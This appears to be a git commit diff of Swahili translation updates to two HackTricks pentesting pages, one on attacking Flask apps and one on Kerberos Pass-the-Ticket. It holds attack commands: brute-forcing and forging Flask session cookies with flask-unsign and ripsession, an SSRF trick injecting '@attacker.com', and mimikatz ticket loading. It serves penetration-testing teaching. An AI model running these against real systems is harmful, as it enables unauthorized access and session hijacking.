Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-web/flask.md', 'wind

Browse source
This commit is contained in:
Translator 2024-05-05 13:52:52 +00:00
parent 252046b0a8
commit 72dffef4f3
2 changed files with 32 additions and 32 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

36
network-services-pentesting/pentesting-web/flask.md
View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,30 +10,30 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia mchakato** kwa urahisi uliosukumwa na zana za **jamii za juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
**Labda ikiwa unacheza CTF programu ya Flask itahusiana na** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
## Vidakuzi
## Cookies
Jina la kikao cha kuki cha chaguo-msingi ni **`session`**.
Jina la kikao cha biskuti cha chaguo-msingi ni **`kikao`**.
### Mchawi
Dukizi ya mtandaoni ya Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
Mchawi wa mtandaoni wa biskuti za Flask: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
#### Mwongozo
Pata sehemu ya kwanza ya kuki hadi alama ya kwanza na ikibadilishe kwa Base64>
Pata sehemu ya kwanza ya biskuti hadi alama ya kwanza na ikodishe Base64>
```bash
echo "ImhlbGxvIg" | base64 -d
```
@ -41,7 +41,7 @@ Cookie pia inasainiwa kutumia nenosiri
### **Flask-Unsign**
Zana ya mstari wa amri kutafuta, kudecode, kufanya nguvu ya kutumia na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
Zana ya mstari wa amri ya kupata, kudecode, kufanya nguvu ya kutumia nguvu na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
{% embed url="https://pypi.org/project/flask-unsign/" %}
```bash
@ -59,13 +59,13 @@ flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<coo
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### Kusaini kwa kutumia toleo la zamani (legacy)
#### Kusaini kwa kutumia toleo la zamani (la zamani)
```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
### **RIPsession**
Chombo cha amri ya mstari wa amri kutumia nguvu kwenye tovuti kutumia vidakuzi vilivyoundwa na flask-unsign.
Chombo cha mstari wa amri kutumika kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
```bash
@ -73,11 +73,11 @@ ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s p
```
### SQLi katika kuki ya kikao cha Flask na SQLmap
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa flask kwa kutumia siri inayojulikana.
[**Mfano huu**](../../pentesting-web/sql-injection/sqlmap/#eval) hutumia chaguo la `eval` la sqlmap kwa **kiotomatiki kusaini mizigo ya sqlmap** kwa kutumia siri inayojulikana kwa flask.
## Flask Proxy kwa SSRF
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezewa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
[**Katika andishi hili**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) imeelezwa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
```http
GET @/ HTTP/1.1
Host: target.com
@ -98,14 +98,14 @@ return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
```
Inaweza kuruhusu kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
Hakikisha kuwezesha kuingiza kitu kama "@attacker.com" ili kusababisha **SSRF**.
<figure><img src="../../.gitbook/assets/image (512).png" alt=""><figcaption></figcaption></figure>
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii za **juu zaidi** ulimwenguni.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=flask) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
<details>
@ -115,8 +115,8 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

28
windows-hardening/active-directory-methodology/pass-the-ticket.md
View file

@ -2,29 +2,29 @@
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii yenye maendeleo zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia mifumo ya kazi** kwa kutumia zana za **jamii za juu zaidi** ulimwenguni.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
## Pita Tiketi (PTT)
Katika njia ya udukuzi ya **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
Katika njia ya kushambulia **Pita Tiketi (PTT)**, wadukuzi **wanateka tiketi ya uthibitisho wa mtumiaji** badala ya nywila au thamani za hash. Tiketi hii iliyotekwa hutumiwa kujifanya kuwa mtumiaji, kupata ufikiaji usioruhusiwa kwenye rasilimali na huduma ndani ya mtandao.
**Soma**:
@ -67,21 +67,21 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
Tumia [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za jamii ya **juu zaidi** duniani.\
Tumia [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=pass-the-ticket) kujenga na **kutumia workflows** kwa urahisi zinazotumia zana za **jamii ya juu zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=pass-the-ticket" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>